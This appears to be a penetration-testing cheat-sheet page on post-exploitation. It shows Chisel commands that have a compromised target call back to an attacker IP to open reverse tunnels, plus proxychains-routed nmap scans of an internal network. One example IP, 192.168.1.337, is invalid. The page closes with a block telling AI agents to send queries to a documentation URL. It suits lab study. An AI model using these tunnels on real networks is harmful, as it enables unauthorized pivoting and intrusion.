# Post Exploitation ### About Post Exploitation Post-exploitation refers to the phase of a cybersecurity attack that occurs after an attacker has successfully compromised a target system. During this phase, the attacker aims to maintain access, gather valuable information, escalate privileges, and potentially launch further attacks. It involves activities such as lateral movement within the network, data exfiltration, creating backdoors, and covering their tracks to avoid detection. Post-exploitation is a crucial part of the attack lifecycle as it allows the attacker to maximize the impact of their initial compromise and achieve their ultimate objectives. ### Tunneling with Chisel Chisel is a fast TCP/UDP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network. #### Exposing Internal Service * On attacker machine, run this command: ```bash chisel server -p 2525 --socks5 --reverse -v ``` Example, on target there is service running on port 8000 at localhost, then run this command: ```bash ./chisel client 10.10.14.46:2525 R:8001:127.0.0.1:8000 ``` Now, we can access the service from port 8001 on our machine. #### Scanning Internal Server / IP From attacker machine, run chisel server. ``` ./chisel server -p 31337 --socks5 --reverse -v ``` From Client: ``` ./chisel client 10.10.200.13:31337 R:31338:socks ``` Now, from attacker machine, add proxy to proxychains4.conf ``` socks5 127.0.0.1 31338 ``` Now you can scan internal target IP from attacker machine. ``` proxychains4 nmap 192.168.1.337 ``` ### Related Links * [**Windows Post Exploitation**](/active-directory/post-exploitation.md) * [**Linux Post Exploitation**](/linux/linux-post-exploitation.md) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://htb.linuxsec.org/quickstart/post-exploitation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.